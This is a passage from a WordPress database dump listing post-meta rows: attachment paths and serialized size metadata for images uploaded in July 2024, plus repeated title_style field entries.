0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(386,147,'_wp_attached_file','2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg'),
(387,147,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:300;s:4:\"file\";s:61:\"2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\";s:8:\"filesize\";i:80537;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"448905004_973201524597519_7994539186753533290_n-1-300x180.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18934;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"448905004_973201524597519_7994539186753533290_n-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9257;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:61:\"448905004_973201524597519_7994539186753533290_n-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21298;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(388,148,'title_style','default'),
(389,148,'_title_style','field_5d1a0217cf408'),
(390,149,'title_style','default'),
(391,149,'_title_style','field_5d1a0217cf408'),
(392,150,'title_style','default'),
(393,150,'_title_style','field_5d1a0217cf408'),
(401,154,'title_style','default'),
(402,154,'_title_style','field_5d1a0217cf408'),
(403,155,'_wp_attached_file','2024/07/rovbb.png'),
(404,155,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2000;s:6:\"height\";i:700;s:4:\"file\";s:17:\"2024/07/rovbb.png\";s:8:\"filesize\";i:65574;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"rovbb-300x105.png\";s:5:\"width\";i:300;s:6:\"height\";i:105;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5296;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"rovbb-1024x358.png\";s:5:\"width\";i:1024;s:6:\"height\";i:358;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29237;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"rovbb-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3711;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"rovbb-768x269.png\";s:5:\"width\";i:768;s:6:\"height\";i:269;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18905;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"rovbb-1536x538.png\";s:5:\"width\";i:1536;s:6:\"height\";i:538;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50615;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"rovbb-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7868;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(405,156,'title_style','default'),
(406,156,'_title_style','field_5d1a0217cf408'),
(407,157,'title_style','default'),
(408,157,'_title_style','field_5d1a0217cf408'),
(409,158,'title_style','default'),
(410,158,'_title_style','field_5d1a0217cf408'),
(411,159,'title_style','default'),
(412,159,'_title_style','field_5d1a0217cf408'),
(417,164,'_wp_attached_file','2024/07/1-2566.png'),
(418,164,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/1-2566.png\";s:8:\"filesize\";i:1252356;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"1-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115311;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"1-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:928087;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"1-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47153;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"1-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1023793;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"1-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131036;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(445,167,'_wp_attached_file','2024/07/1-2566-1.png'),
(446,167,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/1-2566-1.png\";s:8:\"filesize\";i:1252356;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"1-2566-1-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115311;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"1-2566-1-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:928087;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"1-2566-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47153;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"1-2566-1-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1023793;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"1-2566-1-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131036;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(447,168,'_wp_attached_file','2024/07/2-2566.png'),
(448,168,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/2-2566.png\";s:8:\"filesize\";i:1223222;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"2-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115796;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"2-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:911086;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"2-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47069;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"2-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1002335;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"2-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:124424;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(449,169,'_wp_attached_file','2024/07/3-1-2566.png'),
(450,169,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/3-1-2566.png\";s:8:\"filesize\";i:1375212;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"3-1-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:114967;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"3-1-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:948900;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"3-1-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47284;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"3-1-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1045170;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"3-1-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107303;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(451,170,'_wp_attached_file','2024/07/3-2-2566.png'),
(452,170,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:20:\"2024/07/3-2-2566.png\";s:8:\"filesize\";i:1444105;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"3-2-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:120737;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"3-2-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:972982;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"3-2-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50794;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"3-2-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1072077;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"3-2-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:128683;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(453,171,'_wp_attached_file','2024/07/4-2566.png'),
(454,171,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/4-2566.png\";s:8:\"filesize\";i:1262171;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"4-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117342;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"4-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:967718;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"4-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47449;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"4-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1066804;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"4-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133177;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(455,172,'_wp_attached_file','2024/07/5-2566.png'),
(456,172,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/5-2566.png\";s:8:\"filesize\";i:1521476;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"5-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:126701;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"5-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1108933;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"5-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47403;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"5-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1225101;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"5-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125341;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(457,173,'_wp_attached_file','2024/07/6-2566.png'),
(458,173,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/6-2566.png\";s:8:\"filesize\";i:1446163;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"6-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117629;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"6-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1066279;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"6-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44657;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"6-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1179916;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"6-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117435;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(459,174,'_wp_attached_file','2024/07/7-2566.png'),
(460,174,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/7-2566.png\";s:8:\"filesize\";i:1268562;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"7-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116764;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"7-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:963194;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"7-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46916;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"7-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1062261;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"7-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132995;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(461,175,'_wp_attached_file','2024/07/8-2566.png'),
(462,175,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/8-2566.png\";s:8:\"filesize\";i:1511353;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"8-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:125102;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"8-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1079672;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"8-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48074;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"8-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1191758;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"8-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:121938;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(463,176,'_wp_attached_file','2024/07/9-2566.png'),
(464,176,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:18:\"2024/07/9-2566.png\";s:8:\"filesize\";i:1380727;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"9-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:115928;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"9-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:943551;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"9-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:45462;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"9-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1037151;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:18:\"9-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:117506;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(465,177,'_wp_attached_file','2024/07/10-2566.png'),
(466,177,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/10-2566.png\";s:8:\"filesize\";i:1325901;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"10-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:119337;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"10-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:946343;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"10-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:49376;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"10-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1043477;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"10-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:133101;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(467,178,'_wp_attached_file','2024/07/11-2566.png'),
(468,178,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:794;s:6:\"height\";i:1123;s:4:\"file\";s:19:\"2024/07/11-2566.png\";s:8:\"filesize\";i:1483898;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"11-2566-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:120859;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"11-2566-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1019781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"11-2566-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47273;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"11-2566-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1122719;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:19:\"11-2566-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:112633;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(469,179,'_wp_attached_file','2024/07/12-2566.png'),
